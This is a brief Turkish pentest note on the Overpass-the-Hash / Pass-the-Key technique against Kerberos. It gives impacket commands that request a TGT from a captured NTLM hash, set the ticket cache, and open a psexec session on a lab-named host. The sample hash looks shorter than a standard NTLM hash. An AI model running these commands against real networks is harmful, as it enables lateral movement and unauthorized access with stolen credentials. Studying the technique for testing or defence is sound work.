Overpass The Hash/Pass The Key (PTK)

Eğer bir NTLM hashi ele geçirdiysek ve sistem makineye bağlanmamıza izin vermiyorsa (psexec, evil-winrm vs gibi yöntemlerle) burada yapılacak şey, ele geçirdiğimiz hash ve kullanıcı bilgileriyle bir tgt bileti talep ederek, ele geçirdiğimiz kullanıcının yetkileri ile makineye bağlanmaya çalışmak olacaktır.

impacket-getTGT jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0a

export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache

impacket-psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

Kerberos (II): How to attack Kerberos?Tarlogic Security